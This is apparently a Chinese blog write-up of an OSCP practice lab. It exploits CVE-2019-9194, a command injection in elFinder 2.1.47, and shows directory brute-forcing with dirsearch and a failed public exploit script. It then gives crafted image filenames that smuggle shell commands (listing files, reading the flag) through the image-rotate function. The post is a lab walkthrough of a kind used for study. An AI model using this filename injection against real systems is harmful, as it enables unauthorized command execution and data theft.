“ CVE-2019-9194”
看到了,关注一下不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP备考,车联网,渗透红队以及漏洞挖掘工具等信息分享,欢迎加入;以及想挖SRC逻辑漏洞的朋友,可以私聊。
01
—
CVE-2019-9194
打开靶机后,题目已经提示了我们要用这个directory-list-2.3-small.txt目录去做目录扫描,果断使用了dirsearch:
dirsearch -u http://192.168.207.46 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt扫出来只有一个302的目录:
猜测可能是二次目录爆破,因为题目已经提示了一个CMS框架:elFinder,那就继续爆破:
dirsearch -u http://192.168.207.46/seclab果然,这回就爆出来很多目录:
一顿信息查看,发现就是elFinder这个框架:
搜索了一下2.1.47,发现了一个命令执行的漏洞
直接复制脚本,按照脚本的要求创建了一个文件名为SecSignal.jpg的图片文件,然后直接上脚本:
python2 46481.py http://192.168.207.46/seclab但是试了很多次都没有成功:
查看readme.md文件的时候,看见了一个目录:
访问看,居然是一个后台:
这回直接去查了一下这个漏洞的复现,看了一下漏洞原理,发现是因为在对图片进行旋转的时候,没有做处理,图片名在恶意的构造下可以进行命令执行攻击,这里我把图片的名字改成了这个:
test.png;ls > pwn;echo test.png然后对它进行旋转90°的操作:
执行后,在这个目录下查看到了刚刚生成的pwn文件,里面有我们命令执行的内容:
http://192.168.207.46/seclab/php/pwn
哈哈,就是它了,这时候改一下图片名字,在旋转一次就好了:
test.png;cat flag* > pwn;echo test.png
大工告成!
02
—
总结
在现成的漏洞脚本没有成功的情况下,我们可以尝试的去理解漏洞的发生原理,直接构造攻击也可以。
参考资料:
https://aluvion.github.io/2019/03/22/%E5%88%92%E6%B0%B4CVE-2019-9194%E5%A4%8D%E7%8E%B0/https://cloud.tencent.com/developer/article/1472552
更多精彩内容请扫码关注“重生者安全”星球
免责声明:
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。
第二十七条:任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序和工具;明知他人从事危害网络安全的活动,不得为其提供技术支持、广告推广、支付结算等帮助
第十二条: 国家保护公民、法人和其他组织依法使用网络的权利,促进网络接入普及,提升网络服务水平,为社会提供安全、便利的网络服务,保障网络信息依法有序自由流动。
任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,煽动颠覆国家政权、推翻社会主义制度,煽动分裂国家、破坏国家统一,宣扬恐怖主义、极端主义,宣扬民族仇恨、民族歧视,传播暴力、淫秽色情信息,编造、传播虚假信息扰乱经济秩序和社会秩序,以及侵害他人名誉、隐私、知识产权和其他合法权益等活动。
第十三条: 国家支持研究开发有利于未成年人健康成长的网络产品和服务,依法惩治利用网络从事危害未成年人身心健康的活动,为未成年人提供安全、健康的网络环境。
原文始发于微信公众号(道玄网安驿站):OSCP-第十三章课后题VM#2靶机
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论